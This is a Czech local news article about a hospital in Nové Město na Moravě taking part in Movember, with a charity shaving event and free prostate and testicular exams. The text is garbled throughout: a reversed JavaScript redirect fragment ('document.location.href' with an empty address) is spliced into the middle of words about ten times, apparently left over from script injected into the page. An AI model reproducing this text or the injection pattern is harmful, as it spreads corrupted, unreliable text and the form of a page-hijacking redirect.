Rainbow page separator

V nemocnici bude skupinové holení na podporu výzkumu rakoviny

Středa, 27. října 2021

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Už třetím rokem se novoměstská nemocnice připojuje k charitativní lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadové akci Movember, kdy mužům nabídne preventivní vyšetření prostaty a varlat a koncem měsíce i veřejnou holírnu v chirurgickém pavilonu. Právě v ní se pánové v úterý 23. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu od 13 do 16 hodin dostanou možnost zbavit svého kníru – v lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu si muži po celém světě nechávají narůst knír, který si pak nechají oholit, aby podpořili výzkum a prevenci rakoviny prostaty a varlat. K akci se již tradičně připojují i novoměstští urologové a také le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos budou pány holit budoucí kadeřníci a kadeřnice ze žďárské obchodní školy. Výtěžek poputuje nadačnímu fondu Muži proti rakovině – za předchozí dva ročníky se nemocnici podařilo získat prostředky ve výši 130 tisíc korun.
Preventivní vyšetření nad rámec ordinačních hodin budou prováděna ve středu 3. a 24. lis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topadu v době od 14 do 16 hodin v urologické ambulanci. „Zájemci se musí předem objednat a alespoň den před domluveným vyšetřením navštívit urologickou ambulanci k provedení odběru krve a moči. Pánové se mohou objednávat na čísle 566 801 203,“ uvedla mluvčí nemocnice Tamara Pecková.
Samotné vyšetření obstará špičkový ultrazvukový přístroj a k dispozici je i moderní labora[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torní diagnostiku nádorů prostaty z odběru krve. „Vyšetření prostaty je vhodné u mužů starších 50 let věku, kteří nebyli během posledních dvou let vyšetřeni, a u mužů nad 45 let v případě, že byl jejich blízkému příbuznému diagnostikován karcinom prostaty. Vyšetření varlat není věkově limi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];továno,“ upřesnil urolog novoměstské nemocnice Jiří Janů.